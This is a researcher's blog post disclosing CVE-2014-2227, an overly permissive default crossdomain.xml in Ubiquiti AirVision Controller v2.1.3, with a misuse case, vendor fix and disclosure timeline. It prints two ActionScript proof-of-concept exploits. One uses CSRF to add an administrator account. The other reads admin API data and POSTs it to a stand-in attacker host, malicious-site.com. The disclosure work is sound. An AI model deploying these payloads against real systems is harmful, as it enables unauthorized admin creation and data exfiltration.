CVE-2014-2227

-
This CVE covers a vulnerability found in the Ubiquiti Networks AirVision application.  For more background on this particular vulnerability, check out this post:

Exploiting misconfigured crossdomain.xml files

In fact, I wrote that first crossdomain.xml blog post after finding this AirVision vulnerability back in February.  If you already read that post, you should recognize the vulnerable form I use for the POC here (adding an administrator), is the same one I used earlier.

Here is a cleaned up version of what I sent to Ubiquiti back in February:

AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml



Misuse Case

If the victim user is authenticated with their AirVision Controller, and they visit a malicious site, the owner of the malicious site can make changes to, and read data from, the AirVision Controller. The malicious site can even add a new administrative user account.  

Vulnerable default configuration:



POC:

Step 1: Attacker hosts the malicious SWF on his/her server, and socially engineers a victim AirVision administrator who is currently logged in, to view the SWF file
Step 2: The victim, while logged into AirVision, views the SWF file on the attackers server:


Step 3: The SWF loads on the victims machine, and makes a request on behalf of the victim (exploiting CSRF to add an administrator):


Response:

Step 4: The SWF is able to bypass Same-Origin-Policy because of the overly permissive crossdomain.xml file, and it records the server response to the previous request, and sends that to the attacker:

The server receives the information and responds with a HTTP 200 OK.
Here is another example of how an attacker could exploit this vulnerability, that is much different than what CSRF can do. In the screenshot below, the SWF makes a request to /api/2.0/log?type=error.  The SWF then reads the data that comes back from that request and sends it to the attacker’s server, where the attacker consumes the raw data.    





Additional details:

(CVE-2014-2227) - Ubiquiti Networks - AirVision v2.1.3 - Overly Permissive default crossdomain.xml

 -----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)
----------------------------------------------
Affected Products/Versions:
----------------------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected

-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
Researcher: Seth Art - @sethsec
Detailed writeup (includes screenshots): http://sethsec.blogspot.com/2014/07/cve-2014-2227.html

------------------------------------------------------------------------------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an  administrator:
------------------------------------------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit)
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLRequestHeader;

public class XDomainXploit3 extends Sprite {
 public function XDomainXploit3() {
  // Target URL from where the data is to be retrieved
  var readFrom:String = "https//victim:7443/api/2.0/admin";
  var header:URLRequestHeader = new URLRequestHeader("Content-Type",
"text/plain; charset=UTF-8");
  var readRequest:URLRequest = new URLRequest(readFrom);
  readRequest.method = URLRequestMethod.POST
  readRequest.data =
"{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
  readRequest.requestHeaders.push(header);
  var getLoader:URLLoader = new URLLoader();
  getLoader.addEventListener(Event.COMPLETE, eventHandler);
  try {
   getLoader.load(readRequest);
  } catch (error:Error) {
   trace("Error loading URL: " + error);
  }
 }


 private function eventHandler(event:Event):void {
  // URL to which retrieved data is to be sent
  var sendRequest:URLRequest = new URLRequest(sendTo);
  sendRequest.method = URLRequestMethod.POST;
  sendRequest.data = event.target.data;
  var sendLoader:URLLoader = new URLLoader();
  try {
   sendLoader.load(sendRequest);
  } catch (error:Error) {
   trace("Error loading URL: " + error);
  }
 }
}
}

-----------------------------------------------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
-----------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github: (https://github.com/gursev/flash-xdomain-xploit)
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;


public class XDomainXploit extends Sprite {
 public function XDomainXploit() {
  // Target URL from where the data is to be retrieved
  var readFrom:String = "/victim:7443/api/2.0/admin";
  var readRequest:URLRequest = new URLRequest(readFrom);
  var getLoader:URLLoader = new URLLoader();
  getLoader.addEventListener(Event.COMPLETE, eventHandler);
  try {
   getLoader.load(readRequest);
  } catch (error:Error) {
   trace("Error loading URL: " + error);
  }
 }


 private function eventHandler(event:Event):void {
  // URL to which retrieved data is to be sent
  var sendTo:String = "http://www.malicious-site.com/admin"
  var sendRequest:URLRequest = new URLRequest(sendTo);
  sendRequest.method = URLRequestMethod.POST;
  sendRequest.data = event.target.data;
  var sendLoader:URLLoader = new URLLoader();
  try {
   sendLoader.load(sendRequest);
  } catch (error:Error) {
   trace("Error loading URL: " + error);
  }
 }
}
}

-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video)

-----------------------------
Disclosure Timeline:
-----------------------------

2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure

Comments

Post a Comment

Popular posts from this blog

Exploiting Python Code Injection in Web Applications

-
Image
A web application vulnerable to Python code injection allows you to send Python code though the application to the Python interpreter on the target server. If you can execute python, you can likely call operating system commands. If you can run operating system commands, you can read/write files that you have access to, and potentially even launch a remote interactive shell (e.g., nc, Metasploit, Empire). The thing is, when I needed to exploit this on an external penetration test recently, I had a hard time finding information online about how to move from proof of concept (POC) to useful web application exploitation. Together with my colleague Charlie Worrell ( @decidedlygray ),  we were able to turn the Burp POC (sleep for 20 seconds) into a non interactive shell, which is what this post covers. Python code injection is a subset of server-side code injection, as this vulnerability can occur in many other languages (e.g., Perl and Ruby). In fact, for those of you who are CWE fans
Read more

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)

-
Image
I recently came across a Server Side Request Forgery (SSRF) vulnerability within an application that I assessed.  The application was hosted on Amazon EC2 and was using Node.js, Express.js, and as I found out later, Needle.js. Discovery   Manual Discovery In the discovery phase, I noticed a function of the application that was taking a user specified URL and displaying the first paragraph from that URL into the page.  This application allowed a user to share a URL with their friends, and grabbing the first paragraph was a feature that would provide the friends with more context. The thing is, when looking at my Burp history, I could not find the request to the URL that I specified in my logs.  This should raise an eyebrow!   This means that the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF .  Then, the only question was: What is the risk? Automated Discovery Since April 2015, if you a
Read more

Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them

-
Image
TL;DR There are a lot of great blogs out there that show you how to Kerberoast.  In this post, I'm going to walk through the process of setting up your lab so that you can practice this attack.  This involves creating a domain user and then mapping a SPN to that account. After that, I'll walk through using Empire to launch Invoke-Kerberoast, and I'll crack the hashes offline with Hashcat. Pentest Home Lab Recap If you don't already have an Active Directory lab and want to build one so that you can play along, check out my previous posts: Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain   Pentest Home Lab - 0x1 - Building Your AD Lab on AWS Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE The Attack: Kerberoasting Attack Goals Domain privesc & lateral movement.  If you have domain credentials and access to the domain, this is a relatively easy way to gain additional access within the domain. If all goes well, you
Read more